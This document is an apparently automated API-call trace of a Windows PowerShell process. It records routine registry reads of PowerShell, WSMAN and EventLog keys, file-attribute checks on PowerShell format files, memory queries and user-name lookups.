[0080.040] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x9b0ad848, Data2=0x946c, Data3=0x41a5, Data4=([0]=0x90, [1]=0xdf, [2]=0xaf, [3]=0xab, [4]=0x96, [5]=0x95, [6]=0xb4, [7]=0x1f))) returned 0x0
[0080.040] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x9ccde71a, Data2=0xdd2f, Data3=0x478f, Data4=([0]=0xb7, [1]=0x74, [2]=0x2e, [3]=0x75, [4]=0xac, [5]=0x63, [6]=0x66, [7]=0x1))) returned 0x0
[0080.040] VirtualQuery (in: lpAddress=0x16bcb0, lpBuffer=0x16cb70, dwLength=0x30 | out: lpBuffer=0x16cb70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.040] VirtualQuery (in: lpAddress=0x16bcb0, lpBuffer=0x16cb70, dwLength=0x30 | out: lpBuffer=0x16cb70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.040] VirtualQuery (in: lpAddress=0x16bcb0, lpBuffer=0x16cb70, dwLength=0x30 | out: lpBuffer=0x16cb70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.040] VirtualQuery (in: lpAddress=0x16bcb0, lpBuffer=0x16cb70, dwLength=0x30 | out: lpBuffer=0x16cb70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.040] SetErrorMode (uMode=0x1) returned 0x1
[0080.041] SetErrorMode (uMode=0x1) returned 0x1
[0080.041] GetFileType (hFile=0x30c) returned 0x1
[0080.041] SetErrorMode (uMode=0x1) returned 0x1
[0080.041] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cf80 | out: lpFileInformation=0x16cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
[0080.041] SetErrorMode (uMode=0x1) returned 0x1
[0080.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
[0080.042] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d068 | out: phkResult=0x16d068*=0x30c) returned 0x0
[0080.042] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cfec, lpData=0x0, lpcbData=0x16cfe8*=0x0 | out: lpType=0x16cfec*=0x1, lpData=0x0, lpcbData=0x16cfe8*=0x56) returned 0x0
[0080.042] CoTaskMemAlloc (cb=0x5a) returned 0x2f9460
[0080.042] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cfbc, lpData=0x2f9460, lpcbData=0x16cfb8*=0x56 | out: lpType=0x16cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16cfb8*=0x56) returned 0x0
[0080.042] CoTaskMemFree (pv=0x2f9460)
[0080.042] RegCloseKey (hKey=0x30c) returned 0x0
[0080.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
[0080.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
[0080.043] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x9de26d6, Data2=0xcac5, Data3=0x4390, Data4=([0]=0xbb, [1]=0x4a, [2]=0xb6, [3]=0xaf, [4]=0xfb, [5]=0xaf, [6]=0x35, [7]=0xc8))) returned 0x0
[0080.043] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x3fc10509, Data2=0x30b2, Data3=0x4a19, Data4=([0]=0xb6, [1]=0x5, [2]=0x14, [3]=0xb6, [4]=0xc2, [5]=0xa9, [6]=0xa5, [7]=0x9e))) returned 0x0
[0080.043] SetErrorMode (uMode=0x1) returned 0x1
[0080.043] SetErrorMode (uMode=0x1) returned 0x1
[0080.043] GetFileType (hFile=0x30c) returned 0x1
[0080.044] SetErrorMode (uMode=0x1) returned 0x1
[0080.044] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cf80 | out: lpFileInformation=0x16cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
[0080.044] SetErrorMode (uMode=0x1) returned 0x1
[0080.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
[0080.044] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d068 | out: phkResult=0x16d068*=0x30c) returned 0x0
[0080.044] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cfec, lpData=0x0, lpcbData=0x16cfe8*=0x0 | out: lpType=0x16cfec*=0x1, lpData=0x0, lpcbData=0x16cfe8*=0x56) returned 0x0
[0080.044] CoTaskMemAlloc (cb=0x5a) returned 0x2f9460
[0080.044] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cfbc, lpData=0x2f9460, lpcbData=0x16cfb8*=0x56 | out: lpType=0x16cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16cfb8*=0x56) returned 0x0
[0080.044] CoTaskMemFree (pv=0x2f9460)
[0080.044] RegCloseKey (hKey=0x30c) returned 0x0
[0080.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
[0080.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
[0080.045] VirtualQuery (in: lpAddress=0x16bb00, lpBuffer=0x16c9c0, dwLength=0x30 | out: lpBuffer=0x16c9c0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.045] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xec4f6265, Data2=0xb9fe, Data3=0x4c7c, Data4=([0]=0x8f, [1]=0x33, [2]=0x2e, [3]=0xb2, [4]=0x2f, [5]=0xd7, [6]=0xd2, [7]=0x92))) returned 0x0
[0080.045] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x5d1653fd, Data2=0x25b5, Data3=0x49c9, Data4=([0]=0xb9, [1]=0xf7, [2]=0xa6, [3]=0x34, [4]=0x35, [5]=0xf8, [6]=0x99, [7]=0xe2))) returned 0x0
[0080.086] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0080.086] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.086] CoTaskMemFree (pv=0x256670)
[0080.087] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0080.087] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.087] CoTaskMemFree (pv=0x256670)
[0080.087] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0080.087] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.087] CoTaskMemFree (pv=0x256670)
[0080.088] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0080.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.088] CoTaskMemFree (pv=0x256670)
[0080.308] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0080.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.308] CoTaskMemFree (pv=0x256670)
[0080.312] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0080.312] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.312] CoTaskMemFree (pv=0x256670)
[0080.313] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0080.313] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.313] CoTaskMemFree (pv=0x256670)
[0080.325] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d278 | out: phkResult=0x16d278*=0x30c) returned 0x0
[0080.327] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d17c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d178, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d17c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d178*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.327] CoTaskMemFree (pv=0x0)
[0080.327] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.327] RegEnumValueW (in: hKey=0x30c, dwIndex=0x0, lpValueName=0x2ba920, lpcchValueName=0x16d228, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d228, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0080.328] CoTaskMemFree (pv=0x2ba920)
[0080.328] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.328] RegEnumValueW (in: hKey=0x30c, dwIndex=0x1, lpValueName=0x2ba920, lpcchValueName=0x16d228, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d228, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0080.328] CoTaskMemFree (pv=0x2ba920)
[0080.328] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.328] RegEnumValueW (in: hKey=0x30c, dwIndex=0x2, lpValueName=0x2ba920, lpcchValueName=0x16d228, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d228, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0080.328] CoTaskMemFree (pv=0x2ba920)
[0080.328] RegQueryValueExW (in: hKey=0x30c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d20c, lpData=0x0, lpcbData=0x16d208*=0x0 | out: lpType=0x16d20c*=0x1, lpData=0x0, lpcbData=0x16d208*=0x8) returned 0x0
[0080.328] CoTaskMemAlloc (cb=0xc) returned 0x31f400
[0080.328] RegQueryValueExW (in: hKey=0x30c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d1dc, lpData=0x31f400, lpcbData=0x16d1d8*=0x8 | out: lpType=0x16d1dc*=0x1, lpData="2.0", lpcbData=0x16d1d8*=0x8) returned 0x0
[0080.328] CoTaskMemFree (pv=0x31f400)
[0080.535] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1c8 | out: phkResult=0x16d1c8*=0x310) returned 0x0
[0080.535] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d0cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d0c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d0cc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d0c8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.535] CoTaskMemFree (pv=0x0)
[0080.535] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.535] RegEnumValueW (in: hKey=0x310, dwIndex=0x0, lpValueName=0x2ba920, lpcchValueName=0x16d178, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d178, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0080.535] CoTaskMemFree (pv=0x2ba920)
[0080.535] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.535] RegEnumValueW (in: hKey=0x310, dwIndex=0x1, lpValueName=0x2ba920, lpcchValueName=0x16d178, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d178, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0080.535] CoTaskMemFree (pv=0x2ba920)
[0080.535] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.535] RegEnumValueW (in: hKey=0x310, dwIndex=0x2, lpValueName=0x2ba920, lpcchValueName=0x16d178, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d178, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0080.535] CoTaskMemFree (pv=0x2ba920)
[0080.535] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d15c, lpData=0x0, lpcbData=0x16d158*=0x0 | out: lpType=0x16d15c*=0x1, lpData=0x0, lpcbData=0x16d158*=0x8) returned 0x0
[0080.535] CoTaskMemAlloc (cb=0xc) returned 0x31f260
[0080.535] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d12c, lpData=0x31f260, lpcbData=0x16d128*=0x8 | out: lpType=0x16d12c*=0x1, lpData="2.0", lpcbData=0x16d128*=0x8) returned 0x0
[0080.535] CoTaskMemFree (pv=0x31f260)
[0080.535] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0080.535] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.535] CoTaskMemFree (pv=0x256670)
[0080.585] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0080.586] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.586] CoTaskMemFree (pv=0x256670)
[0080.587] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1f8 | out: phkResult=0x16d1f8*=0x324) returned 0x0
[0080.589] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d16c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d168, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d16c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d168*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.589] CoTaskMemFree (pv=0x0)
[0080.590] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.590] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x0, lpName=0x2ba920, lpcchName=0x16d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.590] CoTaskMemFree (pv=0x2ba920)
[0080.590] CoTaskMemFree (pv=0x0)
[0080.590] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.590] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x1, lpName=0x2ba920, lpcchName=0x16d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.590] CoTaskMemFree (pv=0x2ba920)
[0080.590] CoTaskMemFree (pv=0x0)
[0080.590] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.590] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x2, lpName=0x2ba920, lpcchName=0x16d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.590] CoTaskMemFree (pv=0x2ba920)
[0080.590] CoTaskMemFree (pv=0x0)
[0080.590] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.590] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x3, lpName=0x2ba920, lpcchName=0x16d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.590] CoTaskMemFree (pv=0x2ba920)
[0080.590] CoTaskMemFree (pv=0x0)
[0080.590] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.590] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x4, lpName=0x2ba920, lpcchName=0x16d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.590] CoTaskMemFree (pv=0x2ba920)
[0080.590] CoTaskMemFree (pv=0x0)
[0080.590] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.590] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x5, lpName=0x2ba920, lpcchName=0x16d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.590] CoTaskMemFree (pv=0x2ba920)
[0080.590] CoTaskMemFree (pv=0x0)
[0080.590] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.590] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x6, lpName=0x2ba920, lpcchName=0x16d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.590] CoTaskMemFree (pv=0x2ba920)
[0080.590] CoTaskMemFree (pv=0x0)
[0080.590] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.590] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x7, lpName=0x2ba920, lpcchName=0x16d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.590] CoTaskMemFree (pv=0x2ba920)
[0080.590] CoTaskMemFree (pv=0x0)
[0080.590] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.590] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x8, lpName=0x2ba920, lpcchName=0x16d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.590] CoTaskMemFree (pv=0x2ba920)
[0080.591] CoTaskMemFree (pv=0x0)
[0080.591] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d258 | out: phkResult=0x16d258*=0x334) returned 0x0
[0080.591] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d258 | out: phkResult=0x16d258*=0x0) returned 0x2
[0080.591] RegOpenKeyExW (in: hKey=0x324, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d258 | out: phkResult=0x16d258*=0x338) returned 0x0
[0080.591] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d258 | out: phkResult=0x16d258*=0x0) returned 0x2
[0080.591] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d258 | out: phkResult=0x16d258*=0x33c) returned 0x0
[0080.591] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d258 | out: phkResult=0x16d258*=0x0) returned 0x2
[0080.591] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d258 | out: phkResult=0x16d258*=0x340) returned 0x0
[0080.591] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d258 | out: phkResult=0x16d258*=0x0) returned 0x2
[0080.591] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d258 | out: phkResult=0x16d258*=0x344) returned 0x0
[0080.591] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d258 | out: phkResult=0x16d258*=0x0) returned 0x2
[0080.591] RegOpenKeyExW (in: hKey=0x324, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d258 | out: phkResult=0x16d258*=0x348) returned 0x0
[0080.591] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d258 | out: phkResult=0x16d258*=0x0) returned 0x2
[0080.591] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d258 | out: phkResult=0x16d258*=0x0) returned 0x5
[0080.609] RegOpenKeyExW (in: hKey=0x324, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d258 | out: phkResult=0x16d258*=0x34c) returned 0x0
[0080.610] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d258 | out: phkResult=0x16d258*=0x0) returned 0x2
[0080.610] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d258 | out: phkResult=0x16d258*=0x350) returned 0x0
[0080.610] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d258 | out: phkResult=0x16d258*=0x354) returned 0x0
[0080.610] RegCloseKey (hKey=0x354) returned 0x0
[0080.610] RegCloseKey (hKey=0x324) returned 0x0
[0080.610] RegCloseKey (hKey=0x350) returned 0x0
[0080.618] CoTaskMemAlloc (cb=0x804) returned 0x1b81d4f0
[0080.618] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81d4f0, nSize=0x16d468 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x16d468) returned 0x1
[0080.655] CoTaskMemFree (pv=0x1b81d4f0)
[0080.720] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.720] GetUserNameW (in: lpBuffer=0x2ba920, pcbBuffer=0x16d4a8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x16d4a8) returned 1
[0080.720] CoTaskMemFree (pv=0x2ba920)
[0080.738] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1a8 | out: phkResult=0x16d1a8*=0x358) returned 0x0
[0080.738] RegQueryInfoKeyW (in: hKey=0x358, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d11c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d118, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d11c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d118*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.738] CoTaskMemFree (pv=0x0)
[0080.738] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.738] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x0, lpName=0x2ba920, lpcchName=0x16d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.738] CoTaskMemFree (pv=0x2ba920)
[0080.738] CoTaskMemFree (pv=0x0)
[0080.738] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
